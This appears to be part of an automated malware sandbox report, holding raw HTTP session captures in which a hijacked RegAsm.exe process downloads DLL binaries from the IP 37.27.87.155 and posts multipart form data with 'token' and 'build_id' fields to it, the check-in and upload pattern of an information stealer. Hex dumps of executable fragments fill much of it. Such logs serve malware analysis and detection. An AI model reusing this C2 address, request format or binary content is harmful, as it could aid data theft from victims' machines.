                                                                                                                                                                                                                                                                                                2024-04-19 15:08:23 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:23 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                                                                                                                                                                                                                                Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:24 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                                                                                                                                                                                                                                Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:24 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                                                                                                                                                                                                                                                Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:24 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                                                                                                                                                                                                                                Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:24 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                                                                                                                                                                                                                                Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:24 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                                                                                                                                                                                                                                Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:24 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                                                                                                                                                                                                                                Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:24 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                                                                                                                                                                                                                                Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:24 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                                                                                                                                                                                                                                Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                16192.168.2.44975137.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:25 UTC161OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:25 UTC245INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:25 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                Content-Length: 80880
                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ETag: "6315a9f4-13bf0"
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:25 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:25 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                                                                                                                                                                                                                                Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:26 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                                                                                                                                                                                                                                Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:26 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                                                                                                                                                                                                                                Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:26 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                                                                                                                                                                                                                                Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                17192.168.2.44975237.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:26 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDG
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 1145
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:26 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------HDBGDHDAECBGDHJKFIDGCont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:27 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                18192.168.2.44975337.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:28 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FHCBGDAAFBKEBGDHDBKE
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------FHCBGDAAFBKEBGDHDBKECont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:28 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
